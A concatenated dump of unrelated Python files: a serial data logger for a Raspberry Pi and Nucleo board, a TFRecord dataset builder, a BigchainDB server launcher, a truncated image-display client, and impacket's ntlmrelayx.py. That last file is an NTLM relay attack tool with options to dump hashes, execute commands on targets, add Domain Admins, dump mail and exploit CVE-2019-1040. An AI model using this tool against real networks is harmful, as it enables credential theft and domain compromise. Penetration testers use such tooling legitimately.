imposta_strumenti = menu_item(name='imposta strumenti',
info="impostare pin e tipo di strumento")
# nuova misura
nuova_misura = menu_item(name='nuova misura',
info='premere ok per iniziare la registrazione')
app = {
'1': sampling_rate,
'#': imposta_strumenti,
'2': seleziona_strumenti,
'3': nuova_misura
}
def sampling_rate_run(self):
"""
funzione bind oggetto sampling_rate. chiede di reimpostare il parametro sampling rate
:param self:
:return:
"""
# todo aggiornare il parametro via serial sulla nucleo
global sampling_Hz
code, ans_str = d.inputbox(title=self.name,
text=self.info+"\nattuale: {}.\tNuovo:".format(sampling_Hz))
if code == d.OK and ans_str:
sampling_Hz = int(ans_str)
update_sampling_rate()
def seleziona_strumenti_run(self):
"""
bind oggetto seleziona_strumenti. imposta la variabile mem_index con gli indici
degli strumenti da memorizzare secondo l'ordine in cui comunica la nucleo
:param self:
:return:
"""
# todo sistemare upgrade_struenti
global mem_index
update_strumenti()
# visuallizza configurazione corrente
item_list = []
for i in range(len(available_instruments)):
if i in mem_index:
item_list.append((str(i), instruments_db[int(available_instruments[0])][0], True))
else:
item_list.append((str(i), instruments_db[int(available_instruments[i])][0], False))
code, ans = d.buildlist(title=self.name,
text=self.info,
items=item_list)
if code == d.OK:
mem_index = list(int(ans[i]) for i in range(len(ans)))
def nuova_misura_run(self):
"""
bind oggetto nuova_misura. crea il nuovo file csv specificando la cartella e la descrizione
:param self:
:return:
"""
global file_name, last_folder, last_description
# DOC (label, yl, xl, item, yi, xi, field_length, input_length),(row and column numbers starting from 1).
col = max([len('folder: data/'),len('description')])+1
element_list= [('folder: data/', 1, 1, last_folder, 1, col, 20, 100),
('description:', 2, 1, last_description, 2, col, 20, 100)]
# info strumenti
strumenti_str = ', '.join(available_instruments[i] for i in mem_index)
code, ans_list = d.form(title=self.name,
text=(self.info + '\nSampling_rate:' + str(sampling_Hz) + '\nStrumenti:' + strumenti_str),
elements=element_list)
if code == d.CANCEL:
return menu()
else:
# controlla problemi di /
folder, descr = ans_list[0].strip('/'), ans_list[1]
# memorizza ultime preferenze
last_folder, last_description = folder, descr
# corretto cos', il rasp ha una timezone diversa
filename = str(datetime.datetime.now()).split('.')[0].split()
filename = '_'.join(filename[::-1])
# controlla esistenza cartella
if not folder:
folder = 'data' # senza / [1]
elif folder in os.listdir('data/'):
folder = 'data/' + folder
else:
folder = 'data/' + folder
os.mkdir(folder)
# crea il file csv e stampa intestazione [1]x
file_name = '{}/{}.csv'.format(folder, filename)
with open(file_name, mode='w') as file:
print(descr, file=file)
print('sample rate:' + str(sampling_Hz), file=file)
print(strumenti_str, file=file)
return record()
# BIND custom function to objects
sampling_rate.run = types.MethodType(sampling_rate_run, sampling_rate)
seleziona_strumenti.run = types.MethodType(seleziona_strumenti_run, seleziona_strumenti)
nuova_misura.run = types.MethodType(nuova_misura_run, nuova_misura)
def menu():
"""
visualizza il menu principale
:return:
"""
choice_list = []
for opt in sorted(app):
choice_list.append((opt, app[opt].name))
code, ans = d.menu(title='RASPINUCLEO',
text='interfaccia di comunicazione raspi nucleo',
choices=choice_list)
if code == d.OK:
return app[ans].run()
else:
logout()
def update_strumenti():
"""
aggiorn ala lista degli strumenti dispobili
:return:
"""
global available_instruments
# start instrument mode with 'i'
write('i')
available_instruments = read()
def update_sampling_rate():
"""Comunica alla Nucleo il nuovo PERIODO di campionamento in
nuovo periodo = 1000000[us]/f[Hz]
"""
str_LF = str(1000000 // sampling_Hz)
write(str_LF)
pass
def toggle_record():
"""send 'r' to nucleo and nucleo should stop sending data if
sendong, shoud start if not sending
"""
write('r')
pass
def record():
"""avvia la registrazione sulla nucleo esalva i valori sul file csv
:return:
"""
toggle_record()
threading.Thread(target=tail).start()
with open(file_name, mode='a') as file:
in_str = read()
while in_str: # in_str list vuota se non c'è nulla
# todo la nucleo deve spedire in seriale solo quello chel'utente vuole! altrimenti perdi velocità
# todo togliere mem_index dall'algoritmo
in_str = read()
print(in_str, file=file)
in_str = ser.readline()
d.infobox(title='WARNING',
text='recording has stopped')
time.sleep(1)
def tail():
"""
visualizza il contenuto del file csv mentre viene popolato
:return:
"""
code = d.msgbox(text='scrivendo i dati su: {}\nPremere ok per terminare '.format(file_name))
if code:
toggle_record()
def logout():
"""
memorizza le variabili utente per il prossimo avvio
:return:
"""
with shelve.open('last_session', flag='w') as db:
db['index'] = mem_index
db['rate'] = sampling_Hz
db['folder'] = last_folder
db['description'] = last_description
os.system('clear')
return exit(0)
def start_load():
"""carica le variabili utente dal database e gli strumenti dal file instruments.csv
:return:
"""
global last_description, last_folder, mem_index, sampling_Hz
with shelve.open('last_session', flag='r') as db:
mem_index = db['index']
last_folder = db['folder']
last_description = db['description']
sampling_Hz = db['rate']
update_sampling_rate() # chiamare dopo aver caricato il valore
update_strumenti() # permette di eseguire subito una nuova misura
print(available_instruments)
with open('instruments.csv', mode='r') as file:
for line in file:
instruments_db.append(line.split(','))
pass
def write(string):
"""aggiunge LF a string e converte in binario, quindi scrive in ser"""
if ser.writable():
# TODO capire perchè succede questa cazzata!
string = string[:1] + ' ' + string[1:] + '\n'
ser.flushOutput()
ser.write(bytearray(string, 'utf-8'))
# print('sent: ', string.encode('utf-8'))
else:
print('ser not writable')
pass
def read():
"""read serial and return string array
:param ser: serial object Nucleo
:return: empty array in serial is not readable
"""
ser.reset_input_buffer()
data_list = str(ser.readline()).strip("b' \\n").split() # cancellare lettere di conversione da byte a str
return data_list
""" AVVIO SERIALE NUCLEO
suppogo che ci sia solo la nucleo attaccata al raspberry quindi
prendo la prima usb disponibile nella lista
"""
try:
nucleo_port = serial.tools.list_ports.comports()[0][0]
except:
print("nucleo è connessa?")
exit(0)
ser = serial.Serial(port=nucleo_port, baudrate=921600, timeout=2, write_timeout=2)
d = dialog.Dialog(autowidgetsize=True)
if __name__ == '__main__':
start_load()
print()
while True:
menu()
|
tfrecorder_builder.py
|
import tensorflow as tf
import os
import math, json
import sys
from core import dataset_utils
import shutil
import glob
from multiprocessing import Process
import numpy as np
import random
def _get_dataset_filename(dataset_name, output_dir, phase_name, shard_id, num_shards):
output_filename = '%s_%s_%05d-of-%05d.tfrecord' % (dataset_name, phase_name, shard_id, num_shards)
return os.path.join(output_dir, output_filename)
def _dataset_exists(dataset_name, output_dir, phase_name, num_shards):
for shard_id in range(num_shards):
output_filename = _get_dataset_filename(
dataset_name, output_dir, phase_name, shard_id, num_shards)
if not tf.gfile.Exists(output_filename):
return False
return True
def _get_filenames_and_classes(image_dir):
root = image_dir
directories = []
class_names = []
for filename in os.listdir(root):
path = os.path.join(root, filename)
if os.path.isdir(path):
directories.append(path)
class_names.append(filename)
photo_filenames = []
# todo: handle both uppercase and lowercase
if os.name == 'nt':
exts = ["jpg", "jpeg"]
else:
exts = ["jpg", "JPEG", "JPG", "jpeg"]
for directory in directories:
for ext in exts:
for path in glob.glob(os.path.join(directory, "*.%s" % ext)):
# path = os.path.join(directory, filename)
photo_filenames.append(path)
return photo_filenames, sorted(class_names)
def _get_filenames_and_classes_by_train_test(image_dir, train_ratio=0.9):
root = image_dir
directories = []
class_names = []
for filename in os.listdir(root):
path = os.path.join(root, filename)
if os.path.isdir(path):
directories.append(path)
class_names.append(filename)
train_photo_filenames = []
test_photo_filenames = []
random.seed(0)
# todo: handle both uppercase and lowercase
if os.name == 'nt':
exts = ["jpg", "jpeg"]
else:
exts = ["jpg", "JPEG", "JPG", "jpeg"]
for directory in directories:
tmp_photo_filenames = []
for ext in exts:
for path in glob.glob(os.path.join(directory, "*.%s" % ext)):
# path = os.path.join(directory, filename)
tmp_photo_filenames.append(path)
random.shuffle(tmp_photo_filenames)
train_cnt = int(float(len(tmp_photo_filenames)) * train_ratio)
train_photo_filenames += tmp_photo_filenames[:train_cnt]
test_photo_filenames += tmp_photo_filenames[train_cnt:]
return train_photo_filenames, test_photo_filenames, sorted(class_names)
class ImageReader(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self, num_channels):
# Initializes function that decodes Grayscale JPEG data.
self.num_channels = num_channels
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=num_channels)
def read_image_dims(self, sess, image_data):
image = self.decode_jpeg(sess, image_data)
return image.shape[0], image.shape[1]
def decode_jpeg(self, sess, image_data):
image = sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == self.num_channels
return image
def _convert_dataset(dataset_name, phase_name, filenames, class_names_to_ids, output_dir, num_shards,
num_channels=3, attr_map=None):
"""Converts the given filenames to a TFRecord dataset.
Args:
split_name: The name of the dataset, either 'train' or 'validation'.
filenames: A list of absolute paths to png or jpg images.
class_names_to_ids: A dictionary from class names (strings) to ids
(integers).
dataset_dir: The directory where the converted datasets are stored.
"""
num_per_shard = int(math.ceil(len(filenames) / float(num_shards)))
with tf.Graph().as_default():
image_reader = ImageReader(num_channels)
with tf.Session('') as sess:
for shard_id in range(num_shards):
assert not os.path.isfile(output_dir)
if not os.path.isdir(output_dir):
os.makedirs(output_dir)
output_filename = _get_dataset_filename(dataset_name, output_dir, phase_name, shard_id, num_shards)
with tf.python_io.TFRecordWriter(output_filename) as tfrecord_writer:
start_ndx = shard_id * num_per_shard
end_ndx = min((shard_id + 1) * num_per_shard, len(filenames))
for i in range(start_ndx, end_ndx):
sys.stdout.write('\r>> Converting image %d/%d shard %d, %s' % (
i + 1, len(filenames), shard_id, filenames[i]))
sys.stdout.flush()
# Read the filename:
try:
image_data = tf.gfile.FastGFile(filenames[i], 'rb').read()
height, width = image_reader.read_image_dims(sess, image_data)
except:
continue
class_name = os.path.basename(os.path.dirname(filenames[i]))
class_id = class_names_to_ids[class_name]
attr = None
if attr_map is not None:
attr = attr_map[os.path.basename(filenames[i])]
ext = 'jpg'
if sys.version_info[0] == 3:
ext = ext.encode()
class_name = class_name.encode()
example = dataset_utils.image_to_tfexample(image_data, ext, height, width, class_id, class_name,
attr)
tfrecord_writer.write(example.SerializeToString())
sys.stdout.write('/n')
sys.stdout.flush()
def _clean_up_temporary_files(dataset_dir):
"""Removes temporary files used to create the dataset.
Args:
dataset_dir: The directory where the temporary files are stored.
"""
dirs = os.listdir(dataset_dir)
for tmp_dir in dirs:
shutil.rmtree(tmp_dir)
def make_tfrecords_train_test(dataset_name, train_ratio, image_dir, output_dir, num_shards, num_channels,
remove_images):
if not tf.gfile.Exists(image_dir):
tf.gfile.MakeDirs(image_dir)
if _dataset_exists(dataset_name, output_dir, "train", num_shards):
print('Dataset files already exist. Exiting without re-creating them.')
return False
if not os.path.isdir(output_dir):
os.makedirs(output_dir)
training_filenames, test_filenames, class_names = _get_filenames_and_classes_by_train_test(image_dir, train_ratio)
class_names_to_ids = dict(zip(class_names, range(len(class_names))))
_convert_dataset(dataset_name, "train", training_filenames, class_names_to_ids, output_dir, num_shards,
num_channels)
_convert_dataset(dataset_name, "test", test_filenames, class_names_to_ids, output_dir, num_shards,
num_channels)
# Finally, write the labels file:
labels_to_class_names = dict(zip(range(len(class_names)), class_names))
dataset_utils.write_label_file(labels_to_class_names, output_dir, dataset_name)
if remove_images:
_clean_up_temporary_files(image_dir)
return True
def make_tfrecords(dataset_name, phase_name, image_dir, output_dir, num_shards, num_channels, remove_images,
attr_path=None):
if not tf.gfile.Exists(image_dir):
tf.gfile.MakeDirs(image_dir)
if _dataset_exists(dataset_name, output_dir, phase_name, num_shards):
print('Dataset files already exist. Exiting without re-creating them.')
return False
if not os.path.isdir(output_dir):
os.makedirs(output_dir)
random.seed(0)
photo_filenames, class_names = _get_filenames_and_classes(image_dir)
random.shuffle(photo_filenames)
np.save(os.path.join(output_dir, "file_names_%s.npy" % phase_name), photo_filenames)
class_names_to_ids = dict(zip(class_names, range(len(class_names))))
# todo: add bounding box, landmarks, etc data
# First, convert the training and validation sets.
attr_map = None
if attr_path is not None:
assert os.path.isfile(attr_path)
attr_map = json.load(open(attr_path))
_convert_dataset(dataset_name, phase_name, photo_filenames, class_names_to_ids, output_dir, num_shards,
num_channels, attr_map)
# Finally, write the labels file:
labels_to_class_names = dict(zip(range(len(class_names)), class_names))
json.dump(labels_to_class_names, open(os.path.join(output_dir, "labels_%s.json" % phase_name), "w+"))
dataset_utils.write_label_file(labels_to_class_names, output_dir, "%s_%s" % (dataset_name, phase_name))
if remove_images:
_clean_up_temporary_files(image_dir)
return True
if __name__ == '__main__':
fl = tf.app.flags
fl.DEFINE_boolean('parallel_exec', False, '')
fl.DEFINE_boolean('multiple', True, '')
fl.DEFINE_string('dataset_name', "fashionstyle14", "")
fl.DEFINE_string('phase_name', "train", "")
fl.DEFINE_string('image_dir',
'D:/data/fashion/image_retrieval/images_for_tfrecord/warehouse2shopall', '')
fl.DEFINE_string('tfrecord_output',
'D:/data/fashion/image_retrieval/images_for_tfrecord/warehouse2shopall_tfrecord',
'')
fl.DEFINE_string('attr_path',
None,
'')
fl.DEFINE_float('train_ratio', None, '')
fl.DEFINE_integer('num_channels', 3, '')
fl.DEFINE_integer('num_shards', 4, '')
fl.DEFINE_boolean('remove_images', False, '')
F = tf.app.flags.FLAGS
if F.multiple:
image_dirs = glob.glob(os.path.join(F.image_dir, "*"))
for image_dir in image_dirs:
if F.train_ratio is None:
p = Process(target=make_tfrecords, args=(
F.dataset_name, os.path.basename(image_dir), image_dir, F.tfrecord_output, F.num_shards,
F.num_channels, F.remove_images, F.attr_path))
else:
p = Process(target=make_tfrecords_train_test(), args=(
F.dataset_name + "_" + os.path.basename(image_dir), F.train_ratio, image_dir, F.tfrecord_output,
F.num_shards,
F.num_channels, F.remove_images))
print("started to build tfrecords: %s" % (image_dir))
p.start()
if not F.parallel_exec:
p.join()
else:
if F.train_ratio is None:
make_tfrecords(F.dataset_name, F.phase_name, F.image_dir, F.tfrecord_output, F.num_shards, F.num_channels,
F.remove_images, F.attr_path)
else:
make_tfrecords_train_test(F.dataset_name, F.train_ratio, F.image_dir, F.tfrecord_output, F.num_shards,
F.num_channels, F.remove_images)
|
start.py
|
# Copyright BigchainDB GmbH and BigchainDB contributors
# SPDX-License-Identifier: (Apache-2.0 AND CC-BY-4.0)
# Code is Apache-2.0 and docs are CC-BY-4.0
import logging
import setproctitle
import bigchaindb
from bigchaindb.lib import BigchainDB
from bigchaindb.core import App
from bigchaindb.parallel_validation import ParallelValidationApp
from bigchaindb.web import server, websocket_server
from bigchaindb.events import Exchange, EventTypes
from bigchaindb.utils import Process
logger = logging.getLogger(__name__)
BANNER = """
****************************************************************************
* *
* ┏┓ ╻┏━╸┏━╸╻ ╻┏━┓╻┏┓╻╺┳┓┏┓ ┏━┓ ┏━┓ ╺┳┓┏━╸╻ ╻ *
* ┣┻┓┃┃╺┓┃ ┣━┫┣━┫┃┃┗┫ ┃┃┣┻┓ ┏━┛ ┃┃┃ ┃┃┣╸ ┃┏┛ *
* ┗━┛╹┗━┛┗━╸╹ ╹╹ ╹╹╹ ╹╺┻┛┗━┛ ┗━╸╹┗━┛╹╺┻┛┗━╸┗┛ *
* codename "fluffy cat" *
* Initialization complete. BigchainDB Server is ready and waiting. *
* *
* You can send HTTP requests via the HTTP API documented in the *
* BigchainDB Server docs at: *
* https://bigchaindb.com/http-api *
* *
* Listening to client connections on: {:<15} *
* *
****************************************************************************
"""
def start(args):
# Exchange object for event stream api
logger.info('Starting BigchainDB')
exchange = Exchange()
# start the web api
app_server = server.create_server(
settings=bigchaindb.config['server'],
log_config=bigchaindb.config['log'],
bigchaindb_factory=BigchainDB)
p_webapi = Process(name='bigchaindb_webapi', target=app_server.run, daemon=True)
p_webapi.start()
logger.info(BANNER.format(bigchaindb.config['server']['bind']))
# start websocket server
p_websocket_server = Process(name='bigchaindb_ws',
target=websocket_server.start,
daemon=True,
args=(exchange.get_subscriber_queue(EventTypes.BLOCK_VALID),))
p_websocket_server.start()
p_exchange = Process(name='bigchaindb_exchange', target=exchange.run, daemon=True)
p_exchange.start()
# We need to import this after spawning the web server
# because import ABCIServer will monkeypatch all sockets
# for gevent.
from abci import ABCIServer
setproctitle.setproctitle('bigchaindb')
# Start the ABCIServer
if args.experimental_parallel_validation:
app = ABCIServer(app=ParallelValidationApp(events_queue=exchange.get_publisher_queue()))
else:
app = ABCIServer(app=App(events_queue=exchange.get_publisher_queue()))
app.run()
if __name__ == '__main__':
start()
|
ntlmrelayx.py
|
#!/opt/impacket-impacket_0_9_20/bin/python3
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Generic NTLM Relay Module
#
# Authors:
# Alberto Solino (@agsolino)
# Dirk-jan Mollema / Fox-IT (https://www.fox-it.com)
#
# Description:
# This module performs the SMB Relay attacks originally discovered
# by cDc extended to many target protocols (SMB, MSSQL, LDAP, etc).
# It receives a list of targets and for every connection received it
# will choose the next target and try to relay the credentials. Also, if
# specified, it will first to try authenticate against the client connecting
# to us.
#
# It is implemented by invoking a SMB and HTTP Server, hooking to a few
# functions and then using the specific protocol clients (e.g. SMB, LDAP).
# It is supposed to be working on any LM Compatibility level. The only way
# to stop this attack is to enforce on the server SPN checks and or signing.
#
# If the authentication against the targets succeeds, the client authentication
# succeeds as well and a valid connection is set against the local smbserver.
# It's up to the user to set up the local smbserver functionality. One option
# is to set up shares with whatever files you want to so the victim thinks it's
# connected to a valid SMB server. All that is done through the smb.conf file or
# programmatically.
#
import argparse
import sys
import logging
import cmd
try:
from urllib.request import ProxyHandler, build_opener, Request
except ImportError:
from urllib2 import ProxyHandler, build_opener, Request
import json
from threading import Thread
from impacket import version
from impacket.examples import logger
from impacket.examples.ntlmrelayx.servers import SMBRelayServer, HTTPRelayServer
from impacket.examples.ntlmrelayx.utils.config import NTLMRelayxConfig
from impacket.examples.ntlmrelayx.utils.targetsutils import TargetsProcessor, TargetsFileWatcher
from impacket.examples.ntlmrelayx.servers.socksserver import SOCKS
RELAY_SERVERS = []
class MiniShell(cmd.Cmd):
def __init__(self, relayConfig, threads):
cmd.Cmd.__init__(self)
self.prompt = 'ntlmrelayx> '
self.tid = None
self.relayConfig = relayConfig
self.intro = 'Type help for list of commands'
self.relayThreads = threads
self.serversRunning = True
@staticmethod
def printTable(items, header):
colLen = []
for i, col in enumerate(header):
rowMaxLen = max([len(row[i]) for row in items])
colLen.append(max(rowMaxLen, len(col)))
outputFormat = ' '.join(['{%d:%ds} ' % (num, width) for num, width in enumerate(colLen)])
# Print header
print(outputFormat.format(*header))
print(' '.join(['-' * itemLen for itemLen in colLen]))
# And now the rows
for row in items:
print(outputFormat.format(*row))
def emptyline(self):
pass
def do_targets(self, line):
for url in self.relayConfig.target.originalTargets:
print(url.geturl())
return
def do_socks(self, line):
headers = ["Protocol", "Target", "Username", "AdminStatus", "Port"]
url = "http://localhost:9090/ntlmrelayx/api/v1.0/relays"
try:
proxy_handler = ProxyHandler({})
opener = build_opener(proxy_handler)
response = Request(url)
r = opener.open(response)
result = r.read()
items = json.loads(result)
except Exception as e:
logging.error("ERROR: %s" % str(e))
else:
if len(items) > 0:
self.printTable(items, header=headers)
else:
logging.info('No Relays Available!')
def do_startservers(self, line):
if not self.serversRunning:
start_servers(options, self.relayThreads)
self.serversRunning = True
logging.info('Relay servers started')
else:
logging.error('Relay servers are already running!')
def do_stopservers(self, line):
if self.serversRunning:
stop_servers(self.relayThreads)
self.serversRunning = False
logging.info('Relay servers stopped')
else:
logging.error('Relay servers are already stopped!')
def do_exit(self, line):
print("Shutting down, please wait!")
return True
def do_EOF(self, line):
return self.do_exit(line)
def start_servers(options, threads):
for server in RELAY_SERVERS:
#Set up config
c = NTLMRelayxConfig()
c.setProtocolClients(PROTOCOL_CLIENTS)
c.setRunSocks(options.socks, socksServer)
c.setTargets(targetSystem)
c.setExeFile(options.e)
c.setCommand(options.c)
c.setEnumLocalAdmins(options.enum_local_admins)
c.setEncoding(codec)
c.setMode(mode)
c.setAttacks(PROTOCOL_ATTACKS)
c.setLootdir(options.lootdir)
c.setOutputFile(options.output_file)
c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.no_validate_privs, options.escalate_user, options.add_computer, options.delegate_access)
c.setMSSQLOptions(options.query)
c.setInteractive(options.interactive)
c.setIMAPOptions(options.keyword, options.mailbox, options.all, options.imap_max)
c.setIPv6(options.ipv6)
c.setWpadOptions(options.wpad_host, options.wpad_auth_num)
c.setSMB2Support(options.smb2support)
c.setInterfaceIp(options.interface_ip)
c.setExploitOptions(options.remove_mic, options.remove_target)
c.setWebDAVOptions(options.serve_image)
if server is HTTPRelayServer:
c.setListeningPort(options.http_port)
c.setDomainAccount(options.machine_account, options.machine_hashes, options.domain)
elif server is SMBRelayServer:
c.setListeningPort(options.smb_port)
#If the redirect option is set, configure the HTTP server to redirect targets to SMB
if server is HTTPRelayServer and options.r is not None:
c.setMode('REDIRECT')
c.setRedirectHost(options.r)
#Use target randomization if configured and the server is not SMB
#SMB server at the moment does not properly store active targets so selecting them randomly will cause issues
if server is not SMBRelayServer and options.random:
c.setRandomTargets(True)
s = server(c)
s.start()
threads.add(s)
return c
def stop_servers(threads):
todelete = []
for thread in threads:
if isinstance(thread, RELAY_SERVERS):
thread.server.shutdown()
todelete.append(thread)
# Now remove threads from the set
for thread in todelete:
threads.remove(thread)
del thread
# Process command-line arguments.
if __name__ == '__main__':
# Init the example's logger theme
logger.init()
print(version.BANNER)
#Parse arguments
parser = argparse.ArgumentParser(add_help = False, description = "For every connection received, this module will "
"try to relay that connection to specified target(s) system or the original client")
parser._optionals.title = "Main options"
#Main arguments
parser.add_argument("-h","--help", action="help", help='show this help message and exit')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
parser.add_argument('-t',"--target", action='store', metavar = 'TARGET', help='Target to relay the credentials to, '
'can be an IP, hostname or URL like smb://server:445 If unspecified, it will relay back to the client')
parser.add_argument('-tf', action='store', metavar = 'TARGETSFILE', help='File that contains targets by hostname or '
'full URL, one per line')
parser.add_argument('-w', action='store_true', help='Watch the target file for changes and update target list '
'automatically (only valid with -tf)')
parser.add_argument('-i','--interactive', action='store_true',help='Launch an smbclient console instead'
'of executing a command after a successful relay. This console will listen locally on a '
' tcp port and can be reached with for example netcat.')
# Interface address specification
parser.add_argument('-ip','--interface-ip', action='store', metavar='INTERFACE_IP', help='IP address of interface to '
'bind SMB and HTTP servers',default='')
serversoptions = parser.add_mutually_exclusive_group()
serversoptions.add_argument('--no-smb-server', action='store_true', help='Disables the SMB server')
serversoptions.add_argument('--no-http-server', action='store_true', help='Disables the HTTP server')
parser.add_argument('--smb-port', type=int, help='Port to listen on smb server', default=445)
parser.add_argument('--http-port', type=int, help='Port to listen on http server', default=80)
parser.add_argument('-ra','--random', action='store_true', help='Randomize target selection (HTTP server only)')
parser.add_argument('-r', action='store', metavar = 'SMBSERVER', help='Redirect HTTP requests to a file:// path on SMBSERVER')
parser.add_argument('-l','--lootdir', action='store', type=str, required=False, metavar = 'LOOTDIR',default='.', help='Loot '
'directory in which gathered loot such as SAM dumps will be stored (default: current directory).')
parser.add_argument('-of','--output-file', action='store',help='base output filename for encrypted hashes. Suffixes '
'will be added for ntlm and ntlmv2')
parser.add_argument('-codec', action='store', help='Sets encoding used (codec) from the target\'s output (default '
'"%s"). If errors are detected, run chcp.com at the target, '
'map the result with '
'https://docs.python.org/2.4/lib/standard-encodings.html and then execute ntlmrelayx.py '
'again with -codec and the corresponding codec ' % sys.getdefaultencoding())
parser.add_argument('-smb2support', action="store_true", default=False, help='SMB2 Support (experimental!)')
parser.add_argument('-socks', action='store_true', default=False,
help='Launch a SOCKS proxy for the connection relayed')
parser.add_argument('-wh','--wpad-host', action='store',help='Enable serving a WPAD file for Proxy Authentication attack, '
'setting the proxy host to the one supplied.')
parser.add_argument('-wa','--wpad-auth-num', action='store',help='Prompt for authentication N times for clients without MS16-077 installed '
'before serving a WPAD file.')
parser.add_argument('-6','--ipv6', action='store_true',help='Listen on both IPv6 and IPv4')
parser.add_argument('--remove-mic', action='store_true',help='Remove MIC (exploit CVE-2019-1040)')
parser.add_argument('--serve-image', action='store',help='local path of the image that will we returned to clients')
#SMB arguments
smboptions = parser.add_argument_group("SMB client options")
smboptions.add_argument('-e', action='store', required=False, metavar = 'FILE', help='File to execute on the target system. '
'If not specified, hashes will be dumped (secretsdump.py must be in the same directory)')
smboptions.add_argument('-c', action='store', type=str, required=False, metavar = 'COMMAND', help='Command to execute on '
'target system. If not specified, hashes will be dumped (secretsdump.py must be in the same '
'directory).')
smboptions.add_argument('--enum-local-admins', action='store_true', required=False, help='If relayed user is not admin, attempt SAMR lookup to see who is (only works pre Win 10 Anniversary)')
#MSSQL arguments
mssqloptions = parser.add_argument_group("MSSQL client options")
mssqloptions.add_argument('-q','--query', action='append', required=False, metavar = 'QUERY', help='MSSQL query to execute'
'(can specify multiple)')
#HTTPS options
httpoptions = parser.add_argument_group("HTTP options")
httpoptions.add_argument('-machine-account', action='store', required=False,
help='Domain machine account to use when interacting with the domain to grab a session key for '
'signing, format is domain/machine_name')
httpoptions.add_argument('-machine-hashes', action="store", metavar="LMHASH:NTHASH",
help='Domain machine hashes, format is LMHASH:NTHASH')
httpoptions.add_argument('-domain', action="store", help='Domain FQDN or IP to connect using NETLOGON')
httpoptions.add_argument('-remove-target', action='store_true', default=False,
help='Try to remove the target in the challenge message (in case CVE-2019-1019 patch is not installed)')
#LDAP options
ldapoptions = parser.add_argument_group("LDAP client options")
ldapoptions.add_argument('--no-dump', action='store_false', required=False, help='Do not attempt to dump LDAP information')
ldapoptions.add_argument('--no-da', action='store_false', required=False, help='Do not attempt to add a Domain Admin')
ldapoptions.add_argument('--no-acl', action='store_false', required=False, help='Disable ACL attacks')
ldapoptions.add_argument('--no-validate-privs', action='store_false', required=False, help='Do not attempt to enumerate privileges, assume permissions are granted to escalate a user via ACL attacks')
ldapoptions.add_argument('--escalate-user', action='store', required=False, help='Escalate privileges of this user instead of creating a new one')
ldapoptions.add_argument('--add-computer', action='store_true', required=False, help='Attempt to add a new computer account')
ldapoptions.add_argument('--delegate-access', action='store_true', required=False, help='Delegate access on relayed computer account to the specified account')
#IMAP options
imapoptions = parser.add_argument_group("IMAP client options")
imapoptions.add_argument('-k','--keyword', action='store', metavar="KEYWORD", required=False, default="password", help='IMAP keyword to search for. '
'If not specified, will search for mails containing "password"')
imapoptions.add_argument('-m','--mailbox', action='store', metavar="MAILBOX", required=False, default="INBOX", help='Mailbox name to dump. Default: INBOX')
imapoptions.add_argument('-a','--all', action='store_true', required=False, help='Instead of searching for keywords, '
'dump all emails')
imapoptions.add_argument('-im','--imap-max', action='store',type=int, required=False,default=0, help='Max number of emails to dump '
'(0 = unlimited, default: no limit)')
try:
options = parser.parse_args()
except Exception as e:
logging.error(str(e))
sys.exit(1)
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
logging.getLogger('impacket.smbserver').setLevel(logging.ERROR)
# Let's register the protocol clients we have
# ToDo: Do this better somehow
from impacket.examples.ntlmrelayx.clients import PROTOCOL_CLIENTS
from impacket.examples.ntlmrelayx.attacks import PROTOCOL_ATTACKS
if options.codec is not None:
codec = options.codec
else:
codec = sys.getdefaultencoding()
if options.target is not None:
logging.info("Running in relay mode to single host")
mode = 'RELAY'
targetSystem = TargetsProcessor(singleTarget=options.target, protocolClients=PROTOCOL_CLIENTS)
else:
if options.tf is not None:
#Targetfile specified
logging.info("Running in relay mode to hosts in targetfile")
targetSystem = TargetsProcessor(targetListFile=options.tf, protocolClients=PROTOCOL_CLIENTS)
mode = 'RELAY'
else:
logging.info("Running in reflection mode")
targetSystem = None
mode = 'REFLECTION'
if not options.no_smb_server:
RELAY_SERVERS.append(SMBRelayServer)
if not options.no_http_server:
RELAY_SERVERS.append(HTTPRelayServer)
if options.r is not None:
logging.info("Running HTTP server in redirect mode")
if targetSystem is not None and options.w:
watchthread = TargetsFileWatcher(targetSystem)
watchthread.start()
threads = set()
socksServer = None
if options.socks is True:
# Start a SOCKS proxy in the background
socksServer = SOCKS()
socksServer.daemon_threads = True
socks_thread = Thread(target=socksServer.serve_forever)
socks_thread.daemon = True
socks_thread.start()
threads.add(socks_thread)
c = start_servers(options, threads)
print("")
logging.info("Servers started, waiting for connections")
try:
if options.socks:
shell = MiniShell(c, threads)
shell.cmdloop()
else:
sys.stdin.read()
except KeyboardInterrupt:
pass
else:
pass
if options.socks is True:
socksServer.shutdown()
del socksServer
for s in threads:
del s
sys.exit(0)
|
rawframe_display.py
|
import sys
import functools
import signal
import select
import socket
import pickle
import time
import struct
import numpy as np
import matplotlib.pyplot as plt
from multiprocessing import Process, Queue
sys.path.append('../dhmsw/')
import interface
PLOT = True
headerStruct = struct.Struct('III')
class guiclient(object):
def __init__(self):
self.sock = None
self.displaythread = Process(target=self.DisplayThread)
self.displaythread.daemon = True
self.displayQ = Queue()
self.exit = False
self.maxlen = 150995023
for sig in [signal.SIGTERM, signal.SIGINT, signal.SIGHUP, signal.SIGQUIT]:
signal.signal(sig, self.signal_handler)
def signal_handler(self, signal, frame):
self.exit = True
self.displayQ.put(None)
def restore_frame(self, data, meta, z):
w, h, compval, val, size, actualsize,ts, gain, ccdtemp = meta
dtidx = 0
for i in range(0, w*h,compval):
z[i] = data[dtidx];
dtidx += 1
def DisplayThread(self):
z = np.zeros((2448,2050),dtype=np.uint8)
mydata2 = np.ones(2448*2050, dtype=np.uint8) * 255
f = None
axes = None
if PLOT:
f, axes = plt.subplots(sharex=True)
for i in range(1):
#axes[i].imshow(z, extent=[0,2448,0,2050], aspect="auto", cmap='gray')
axes.clear()
#axes.imshow(z, extent=[0,2448,0,2050], aspect="auto", cmap='gray')
while True:
